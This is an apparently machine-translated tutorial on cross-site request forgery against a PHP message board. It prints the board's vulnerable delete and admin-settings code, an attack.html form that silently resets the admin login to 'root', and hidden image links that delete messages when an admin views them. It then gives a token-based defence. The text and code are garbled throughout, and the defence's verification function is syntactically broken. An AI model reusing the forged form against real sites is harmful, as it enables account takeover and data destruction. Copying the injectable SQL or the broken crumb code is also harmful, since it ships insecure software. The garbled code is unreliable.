Introduction to forged cross-station requests
The forgery of cross station requests is more difficult to guard against, and the harm is great, in this way attackers can play pranks, send spam information, delete data, and so on. Common manifestations of this attack are:
Forge links, entice users to click, or let the user unknowingly access
Forge forms and entice users to submit them. The form can be hidden, disguised as a picture or link.
A more common and inexpensive precaution is to include a random, frequently converted string in all forms that may involve user writes, and then check the string when processing the form. If this random string is associated with the current user identity, then the attacker would be more troublesome to forge the request.
If an attacker sends a hidden way to the target user link
Instance
V1.0 Network PHP Message Board
Copy Code code as follows:
Delete any message
delbook.php This page to delete a message
<?php
Include_once ("dlyz.php"); dlyz.php user authentication permission, when the permission is admin can delete the message
Include_once (".. /conn.php ");
$del =$_get["Del"];
$id =$_get["id"];
if ($del = = "Data")
{
$ID _dele= implode (",", $_post[' Adid '));
$sql = "Delete from book where ID in (". $ID _dele. ");
mysql_query ($sql);
}
Else
{
$sql = "Delete from book where id=". $id; Pass the message ID to be deleted
mysql_query ($sql);
}
Mysql_close ($conn);
echo "<script language= ' JavaScript ' >";
echo "Alert" (' Delete succeeded! ');";
echo "location= ' book.php ';";
echo "</script>";
?>
When we have admin permission to submit http://localhost/manage/delbook.php?id=2, we delete the message with ID 2
How to use:
We use the ordinary user message (source code method), the content is
Copy Code code as follows:
Insert 4 Picture links delete 4 ID messages, and then we return to the home page to see, no change. The picture doesn't show
Now we use Admin account login, to refresh the home page, will find left a message, other in the picture link designated ID number of the message, all are deleted.
The attacker inserts a hidden picture link in the message, this link has the function of deleting a message, and the attacker's own access to these picture links, it does not have permission, so see no effect, but when the administrator log in, view this message, will perform a hidden link, and his permission is large enough, So these messages are deleted.
Modify Administrator Password
Copy Code code as follows:
pass.php
if ($_get["Act"])
{
$username =$_post["username"];
$sh =$_post["sh"];
$gg =$_post["GG"];
$title =$_post["title"];
$copyright =$_post["Copyright"]. " <br/> website: <a href=http://www.jb51.net> community </a> ";
$password =md5 ($_post["password"]);
if (Empty ($_post["password"]))
{
$sql = "Update gly set Username= '". $username. "', sh= '. $sh.", gg= ' ". $gg." ', title= ' ". $title. where id=1 ";
}
Else
{
$sql = "Update gly set Username= '". $username. "', password= '". $password. "', sh= '. $sh.", gg= ' ". $gg." ', title= ' ". $title." ' , copyright= '. $copyright. "' Where id=1 ';
}
mysql_query ($sql);
Mysql_close ($conn);
echo "<script language= ' JavaScript ' >";
echo "Alert" (' Modified successfully! ');";
echo "location= ' pass.php ';";
echo "</script>";
}
This file is used to modify some information about the admin password and website settings, and we can construct the following form directly:
<body>
<form action= "Http://localhost/manage/pass.php?act=xg" method= "Post" Name= "Form1" Id= "Form1" >
<input type= "Radio" value= "1" name= "sh" >
<input type= "Radio" name= "sh" checked value= "0" >
<input type= "text" name= "username" value= "root" >
<input type= "password" name= "password" value= "root" >
<input type= "text" name= "title" Value= "The Web PHP Message board V1.0 (with audit function)" >
<textarea name= "GG" rows= "6" cols= ">" Welcome you to install the use of the Web PHP message board V1.0 (with the audit function)! </textarea>
<textarea name= "Copyright" rows= "6" cols= ">" The Web PHP message V1.0 Copyright: Xiamen under the network technology 2005-2009<br/> to undertake web site construction and system customization Provide preferential host domain name </textarea>
</form>
</body>
Save As attack.html, put on your website http:// Www.jb51.net This page will automatically submit parameters to the target program's pass.php, user name modified to root, password modified to root, and then we go to the message board to send a message, hide this link, admin access, his username and password all modified into root
Preventing forgery of cross-station requests
Yahoo's approach to forging cross-site requests is to add a random string of called. Crumb to the form, and Facebook has a similar solution, and its table dropdowns often have post_form_id and FB_DTSG.
Random string Code implementation
We follow this idea, cottage a crumb implementation, the code is as follows:
Copy Code code as follows:
<?php
Class Crumb {
CONST SALT = "Your-secret-salt";
static $ttl = 7200;
Static public Function Challenge ($data) {
Return Hash_hmac (' MD5 ', $data, Self::salt);
}
static public Function Issuecrumb ($uid, $action =-1) {
$i = Ceil (Time ()/self:: $TTL);
Return substr (Self::challenge ($i. $action. $uid),-12, 10);
}
static public Function Verifycrumb ($uid, $crumb, $action =-1) {
$i = Ceil (Time ()/self:: $TTL);
if (substr self::challenge ($i. $action $uid), -12 = = $crumb | |
substr (Self::challenge ($i-1). $action. $uid), -12 (+) = = $crumb)
return true;
return false;
}
}
The $uid in the code represents the user's unique identity, while the $TTL represents the valid time for the random string.
application Example
Construct a form
Inserts a hidden random string in the form crumb
Copy Code code as follows:
<form method= "POST" action= "demo.php" >
<input type= "hidden" name= "crumb" value= "<?php Echo crumb::issuecrumb ($uid)?>" >
<input type= "text" name= "Content" >
<input type= "Submit" >
</form>
Working with Forms demo.php
Check the Crumb
Copy Code code as follows:
<?php
if (Crumb::verifycrumb ($uid, $_post[' crumb ')) {
Process a form in the normal process
} else {
Crumb checksum failure, error prompt process
}
?>
